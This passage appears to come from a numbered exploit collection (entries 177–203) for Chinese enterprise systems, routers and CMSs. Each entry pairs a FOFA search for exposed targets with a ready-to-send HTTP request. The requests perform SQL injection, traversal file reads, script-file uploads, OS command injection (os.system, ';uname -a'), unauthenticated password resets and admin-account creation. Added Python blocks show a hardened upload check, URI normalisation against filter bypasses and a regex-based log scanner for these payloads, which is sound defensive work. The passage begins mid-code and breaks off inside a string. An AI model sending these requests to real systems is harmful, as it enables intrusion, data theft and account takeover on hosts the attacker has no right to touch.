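PHP_SHELL = b"<?php phpinfo();unlink(__FILE__);?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def vulnerable_store_path(filename: str, content_type: str, data: bytes):
    """The pattern the entries exploit: the client's Content-Type is the only
    gate, and the client's file name is joined to the upload directory as is,
    so '../../x.aspx' walks out of UPLOAD_DIR and 'test.php' keeps its extension."""
    if not content_type.startswith("image/"):
        return None
    return posixpath.join(UPLOAD_DIR, filename)


def hardened_store_path(filename: str, content_type: str, data: bytes):
    """Content-Type is ignored because the sender chooses it. The name is
    reduced to its base name, the extension must be allow-listed, no script
    extension may appear in any dot- or semicolon-separated part of the name,
    the bytes must start with the signature of the claimed type, and the file
    is stored under a server-generated name."""
    name = posixpath.basename(filename.replace("\\", "/"))
    ext = posixpath.splitext(name)[1].lower()
    if ext not in IMAGE_MAGIC:
        return None
    if {t.lower() for t in re.split(r"[.;]", name)[1:]} & SCRIPT_EXTS:
        return None  # shell.php.png, shell.asp;.jpg and similar names
    if not data.startswith(IMAGE_MAGIC[ext]):
        return None
    return posixpath.join(UPLOAD_DIR, secrets.token_hex(16) + ext)


def confined_to_upload_dir(stored_path: str) -> bool:
    """Post-condition any acceptor must satisfy: the resolved path stays inside UPLOAD_DIR."""
    return posixpath.normpath(stored_path).startswith(UPLOAD_DIR + "/")
```

Run through the page's own samples, vulnerable_store_path accepts test.php with Content-Type image/png and places ../../../../dizxdell.aspx outside the upload directory, while hardened_store_path rejects both and only accepts a real image under a random name.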
177. H3C router sensitive information disclosure
The device configuration file is reachable through a traversal path under the login page; the file name depends on the model:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the stored file (the form field name becomes the file name):
GET /imc/primepush/%2e%2e/flex/12234.txt

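Entries 169, 170, 171, 177 and 178 all reach a protected handler through a path that an authorization filter reads differently from the router: ../ after an exempt directory, %2e%2e that is only decoded later, or a ;param segment that the servlet container strips. The following is an added example, not code from the page or from H3C, Hongjing or CMSV6; the exemption rules are assumed for illustration. It shows why matching on the raw URI fails for each of the page's request lines and what deciding on the canonical path looks like.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical exemptions of a login filter: requests under these prefixes (login page,
# public templates, Flex push channel) or ending in .action are allowed without a session.
PUBLIC_PREFIXES = ("/userLogin.asp", "/templates/attestation/", "/imc/primepush/")
PUBLIC_SUFFIXES = (".action",)

# Request lines taken from entries 169, 178, 177 and 171 above.
BYPASS_URIS = [
    "/templates/attestation/../../selfservice/lawbase/downlawbase?id=1",
    "/imc/primepush/%2e%2e/flexFileUpload",
    "/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg",
    "/run_stop/delete.do;downloadLogger.action?ids=1&loadAll=1",
]


def router_path(raw_uri: str) -> str:
    """The path the dispatcher actually routes: query dropped, percent-decoded
    (twice, so %252e is caught too), ';param' removed from every segment,
    '.' and '..' collapsed, duplicate slashes merged."""
    path = raw_uri.split("?", 1)[0]
    path = unquote(unquote(path))
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return posixpath.normpath("/" + path.lstrip("/"))


def naive_filter_allows(raw_uri: str) -> bool:
    """Broken: decides on the raw request URI, before the container normalises it."""
    uri = raw_uri.split("?", 1)[0]
    return uri.startswith(PUBLIC_PREFIXES) or uri.endswith(PUBLIC_SUFFIXES)


def hardened_filter_allows(raw_uri: str) -> bool:
    """Decides on the same path the router will use, and refuses any request whose
    raw and canonical forms differ: that gap is what every bypass above relies on."""
    canon = router_path(raw_uri)
    raw = raw_uri.split("?", 1)[0].rstrip("/") or "/"
    if canon != raw:
        return False
    return canon.startswith(PUBLIC_PREFIXES) or canon.endswith(PUBLIC_SUFFIXES)


def compare(uris):
    """For each URI: (path the handler sees, naive verdict, hardened verdict)."""
    return [(router_path(u), naive_filter_allows(u), hardened_filter_allows(u)) for u in uris]
```

compare(BYPASS_URIS) shows the naive filter letting all four through while the handler receives /selfservice/lawbase/downlawbase, /imc/flexFileUpload, /ER8300G2.cfg and /run_stop/delete.do; the hardened check blocks all four and still passes a plain /templates/attestation/logo.png. Rejecting on any raw/canonical mismatch is deliberately strict; a looser variant decides on the canonical path alone.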
179. Jianwen (建文) engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke CRM (帮管客 CRM) jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Error-based (MySQL updatexml): the database user name comes back inside the XPath error message.

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based (Oracle ctxsys.drithsx.sn): a vulnerable instance returns the product 111111*111111 inside the ORA error text. The endpoint is a password-change handler, so treat any hit as a potential account takeover.

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user addition
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT that the endpoint executes as sent.

185. Realor (瑞友) Tianyi application virtualization system SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked query with INTO OUTFILE: the hex string decodes to `<?php echo md5("1"); $file = __FILE__; unlink($file);`, which is written to WebRoot\plom.xgi and deletes itself once requested.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

Time-based for SQLite, which has no sleep function: the RANDOMBLOB/HEX heavy query stalls the response instead.

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

Time-based variant of entry 158 (same CVE); a vulnerable instance answers about 5 seconds late.

188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. LANWON (蓝网科技) Clinical Browsing System deleteStudy SQL injection
The documentUniqueId parameter of deleteStudy.php is injectable; the payload stacks a WAITFOR DELAY, so a vulnerable (MSSQL-backed) host answers about 5 seconds late.
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
The poi parameter is handed to a URL fetcher on the server, so a file:// URL returns a local file.
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. ESAFENET (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
The id parameter is injectable (stacked WAITFOR DELAY, about 5 seconds on a vulnerable host). Note the /js/../ segment in the request path: the container normalizes it to /CDGServer3/NavigationAjax, so log searches for the bare path alone will miss this request.
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia Foreign Trade ERP (富通天下外贸ERP) UploadEmailAttr arbitrary file upload
The name query parameter (here .ashx) sets the extension of the stored file; the body is an ASP.NET generic handler that writes "test" when it is requested.
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian Security Management System setSystemTimeAction command execution
Three steps: fetch a CSRF token, run the command through the param field (which is evaluated as Python, so os.system(...) executes a shell command), then read the result back from the web root. Keep the same PHPSESSID across all three requests.
FOFA:body="山石云鉴主机安全管理系统"

Step 1: obtain token_csrf
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: execute (replace {{token}} with the value returned in step 1)
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: verify that the file was written
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. FE Collaboration Platform (飞企互联-FE企业运营管理平台) uploadAttachmentServlet arbitrary file upload
If /servlet/uploadAttachmentServlet answers at all, the target is vulnerable. The filename field is not sanitized, so the ../ sequence writes the JSP into the deployed fe.war directory, where it is served as /hello.jsp.
FOFA:app="FE-协作平台"

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Feiyuxing (飞鱼星) Internet Behavior Management System send_order.cgi command execution
The name field of the JSON body is concatenated into a shell command; the leading ";" terminates the intended command and "uname -a" runs in its place.
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (风速科技) Unified Authentication Platform password reset
The request carries no session or credentials: xgh is the target account and newPass the password it is set to.
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
The goonumStr parameter is injectable (UNION-based). The ";.js" suffix on the path is a path parameter that the servlet container strips before routing, so the request still reaches Quotegask_editAction.entweb.
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. aliyundrive-webdav (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
The sid parameter URL-decodes to `ls />/www/aaa.txt` (backticks included); /www is the uhttpd web root on OpenWrt, so the command output can be fetched afterwards as /aaa.txt. The request needs a valid LuCI sysauth session cookie; the value below is a placeholder.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS assetsmanager/upload file upload
The upload endpoint requires a logged-in session. The chain below obtains one with the default admin/admin credentials, so it only works where those have not been changed.
FOFA:title="Authenticate Please!"

1. Fetch the login CSRF token:
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response 200 contains a value such as csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" (a JWT; the exact value differs per target and per request).

2. Log in with that token to obtain a session cookie:
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response 200 sets the session:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that cookie:
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The file is then served from /storage/uploads/tttt.php (it deletes itself on its first request).

200. SeaCMS (海洋CMS) dmku SQL injection
The id parameter of the dmku endpoint is injectable; a vulnerable host answers about 5 seconds late (sleep(5)).
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) Omni-media News Editing System binary.do SQL injection
The TableName parameter is concatenated into the query; the payload stacks a WAITFOR DELAY, so a vulnerable host answers about 5 seconds late.
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. WeEngine (微擎) AccountEdit arbitrary file upload
The image-upload control on AccountEdit.aspx does not check the file extension, so a .txt (or any other) file is stored under /_data/Uploads/ with its original name. Two steps: read the ASP.NET form tokens, then post the form with them.
FOFA:body="/Widgets/WidgetCollection/"

1. Obtain the __VIEWSTATE and __EVENTVALIDATION values from the page:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Substitute those values for the __VIEWSTATE and __EVENTVALIDATION placeholders below:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then served from /_data/Uploads/1123.txt.

203. Redsea (红海云) eHR PtFjk file upload
The fj_file part is stored with its client-supplied .jsp name; the declared image/jpeg content type is not checked against the extension.
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
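The requests in items 186 to 203 share a handful of payload shapes (time-delay SQL functions, /etc/passwd and file:// reads, ../ inside a multipart filename, script extensions on uploads, shell metacharacters) and a fixed set of endpoints. The Python below is an added triage example for the defensive side, not code from the original list or from any of the vendors named above. It reads constructed reverse-proxy records (JSON lines carrying method, uri and, where the proxy captures it, the body; the record format and the sample data are assumptions, not captured traffic), normalizes the path the way a servlet container would (so /CDGServer3/js/../NavigationAjax and the ;.js suffix of item 197 still match), URL-decodes twice, and reports which rules fire. A bare watched_endpoint hit is informational; any payload rule on top of it is the signal to pull the full request and investigate.

```python
"""Added triage example: match proxy/WAF records against the payload shapes
and endpoints listed in items 186-203. Not code from the original post or
from any vendor. Record format and sample data are constructed assumptions."""
import json
import posixpath
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Endpoints from items 186-203, lower-cased, with path parameters (";.js")
# and "/js/../" segments already normalized away.
WATCHED_PATHS = {
    "/admin/pr_monitor/getting_index_data.php", "/index.cfm/_api/json/v1/default/",
    "/attachment", "/xds/deletestudy.php", "/index.php/admin/userinfo/poihuoqu",
    "/cdgserver3/navigationajax", "/joinfapp/email/uploademailattr",
    "/master/ajaxactions/setsystemtimeaction.php", "/servlet/uploadattachmentservlet",
    "/send_order.cgi", "/cas/userctl/resetpasswordbysuper",
    "/entsoft/quotegask_editaction.entweb", "/cgi-bin/luci/admin/services/aliyundrive-webdav/query",
    "/assetsmanager/upload", "/js/player/dmplayer/dmku/", "/newsedit/newsplan/task/binary.do",
    "/user/accountedit.aspx", "/redseaplatform/ptfjk.mob",
}

# Payload shapes shared by the requests above; matched case-insensitively
# against the decoded query string and body.
PAYLOAD_RULES = {
    "sqli_time_based": re.compile(r"\bsleep\s*\(|waitfor\s+delay|\bbenchmark\s*\(|pg_sleep\s*\(", re.I),
    "sqli_heavy_query": re.compile(r"randomblob\s*\(", re.I),
    "sqli_union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "file_read": re.compile(r"/etc/passwd|file:///", re.I),
    "cmd_injection": re.compile(r"os\.system\s*\(|;\s*uname\b|`[^`]+`", re.I),
    "traversal_in_filename": re.compile(r'filename="[^"]*\.\./', re.I),
    "script_upload": re.compile(r'filename="[^"]*\.(?:jsp|php|ashx|aspx)"|(?:^|[?&])name=\.ashx\b', re.I),
}


def decode(value, rounds=2):
    """URL-decode up to `rounds` times; payloads are frequently double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize_path(raw_path):
    """Decode, strip ';param' per segment, collapse '..', lower-case, keep a trailing slash."""
    decoded = unquote(unquote(raw_path))
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    path = posixpath.normpath("/".join(segments)).lower()
    if decoded.endswith("/") and not path.endswith("/"):
        path += "/"
    return path


def scan_record(record):
    """Return the sorted rule names that fire on one record (dict with 'uri' and optional 'body')."""
    parts = urlsplit(record.get("uri", ""))
    haystack = decode(parts.query) + "\n" + decode(record.get("body") or "")
    hits = [name for name, rule in PAYLOAD_RULES.items() if rule.search(haystack)]
    if normalize_path(parts.path) in WATCHED_PATHS:
        hits.append("watched_endpoint")
    return sorted(hits)


def scan_jsonl(text):
    """Scan newline-delimited JSON records; return (src, uri, hits) for each record that fires."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        hits = scan_record(record)
        if hits:
            findings.append((record.get("src"), record.get("uri"), hits))
    return findings


# Constructed sample records (not captured traffic); bodies appear only where the proxy logged them.
SAMPLE_LOG = r"""
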